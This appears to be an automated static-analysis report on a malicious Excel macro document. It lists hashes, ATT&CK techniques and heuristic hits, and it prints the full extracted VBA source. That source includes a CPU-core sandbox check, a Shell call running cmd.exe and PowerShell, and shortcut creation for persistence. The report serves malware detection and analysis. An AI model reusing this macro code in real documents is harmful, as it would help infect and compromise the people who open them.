Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6ec2bad0d649e406…

MALICIOUS

Office (OOXML)

17.9 KB Created: 2021-05-28 23:44:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-06-17
MD5: fb12accbcee26cd5b33e4f0ee7f9d45a SHA-1: 9fb11119a334c00efb99e3c7cf8b4157e111ff65 SHA-256: 6ec2bad0d649e406c6f37935948de7fff52119a31b26f0a86ec597bc298b4c5e
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that leverage WScript.Shell and cmd.exe to execute a PowerShell command. This command, 'cmd.exe /c powershell.exe z.hyybat >> o.bat', is likely responsible for downloading and executing a second-stage payload. The creation of .lnk files suggests an attempt to establish persistence or facilitate execution of the payload.

Heuristics 7

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Else
            Call Shell("cmd.exe /c powershell.exe z.hyybat >> o.bat")
        End If
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
         .Save
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        Else
            Call Shell("cmd.exe /c powershell.exe z.hyybat >> o.bat")
        End If
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
         .Save
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
        Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
        Else
            Call Shell("cmd.exe /c powershell.exe z.hyybat >> o.bat")
        End If

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1492 bytes
SHA-256: ac108f27138472009bfd8704eabc65b2e4d247548cd2a13b49701bbdf348789d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
Private Sub Commandbh1_Click()
    badCores = 0

    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
    For Each objItem In colItems
            If objItem.NumberOfCores < 3 Then
                badCores = True
            End If
    Next
    If badCores Then
    Else
        Call Shell("cmd.exe /c powershell.exe z.hyybat >> o.bat")
    End If
Dim sShortcutLocation As String

sShortcutLocation = "C:\o.lnk"

With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocation)
     .Save
End With
Dim sShortcutLocations As String

sShortcutLocations = "C:\Users\bjktup\uaz.lnk"

With CreateObject("WScript.Shell").CreateShortcut(sShortcutLocations)
     .Save
End With
End Sub

Attribute VB_Name = "Questa_cartella_di_lavoro"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 12288 bytes
SHA-256: 9dfaa0e032a87881aa1d948c68aeb4935b50e57a9cab9ef458708030a8a0387b
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 2748 bytes
SHA-256: ec9cbea9cdcc5da6eea2effa606940bfc3d9e20253018fafee33281fac0b65fe